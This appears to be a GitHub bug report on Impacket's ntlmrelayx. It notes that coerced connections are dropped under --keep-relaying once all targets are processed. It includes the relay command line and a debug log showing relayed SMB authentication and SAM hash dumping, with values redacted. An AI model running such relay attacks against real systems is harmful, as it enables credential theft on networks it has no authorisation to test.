Open
Description
Coerced connection is being discarded when all targets have been processed and if --keep-relaying flag is enabled.
Discovered in the context of #1974 (comment) (Thanks @rtpt-romankarwacik!)
Debug Output With Command String
Set up ntlmrelayx
python ntlmrelayx.py -t smb://[...] -smb2support --keep-relaying
Coerce 3 connections (separated log lines corresonding to each connection)
Impacket v0.13.0.dev0+20250605.14806.5f78065c - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from [...], attacking target smb://[...]
[*] Authenticating against smb://[...] as [...] SUCCEED
[*] Target system bootKey: [...]
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[...]
[*] Done dumping SAM hashes for host: [...]
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from [...] controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Received connection from [...], attacking target smb://[...]
[*] Authenticating against smb://[...] as [...] SUCCEED
[*] Target system bootKey: [...]
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[...]
[*] Done dumping SAM hashes for host: [...]